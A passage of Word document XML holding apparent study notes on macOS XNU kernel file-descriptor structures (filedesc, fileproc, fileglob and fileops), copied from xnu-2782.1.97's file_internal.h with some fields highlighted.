          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_ofiles</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file structures for open files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char</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_ofileflags</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per-process open file flags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vnode </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_cdir</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current directory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vnode </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_rdir</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root directory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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_nfiles</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number of open files allocated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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_lastfile</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high-water mark of fd_ofiles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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fd_freefile</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approx. next free file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u_short fd_cmask</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mask for file creation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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     fd_knlistsize</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size of knlist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klist </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_knlist</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list of attached knotes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u_long  fd_knhashmask</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size of knhash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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  klist </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_knhash</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* hash table for attached knotes */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0076052F" w:rsidRPr="0076052F" w:rsidRDefault="0076052F" w:rsidP="0076052F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fd_flags</w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0076052F" w:rsidRDefault="0076052F" w:rsidP="0076052F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C736F" w:rsidRPr="0076052F" w:rsidRDefault="007C736F" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file proc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C736F" w:rsidRDefault="007C736F" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filedesc</w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C736F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_ofiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\file_internal.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Kernel descriptor table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * One entry for each open kernel vnode and socket.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileproc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">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unsigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f_flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    int32_t f_iocount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">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struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileglob </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">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void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  f_waddr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file glob</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glob </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LIST_ENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fileglob</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f_msglist</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* list of active files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int32_t fg_flag</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see fcntl.h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int32_t fg_count</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reference count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int32_t fg_msgcount</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references from message queue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int32_t fg_lflags</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file global flags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kauth_cred_t fg_cred</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credentials associated with descriptor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const</w:t>
      </w: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ops </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file_type_t </w:t>
      </w:r>
      <w:r w:rsidRPr="0076737E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fo_type</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descriptor type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read</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uio </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uio</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lastRenderedPageBreak/>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flags</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write</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uio </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uio</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flags</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color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FOF_OFFSET  </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000001</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offset supplied to vn_write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color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FOF_PCRED   </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000002</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cred from proc, not current thread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ioctl</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u_long com</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caddr_t data</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select</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hich</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void</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wql</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close</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glob </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg</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kqfilter</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knote </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kn</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in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o_drain</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fileproc </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
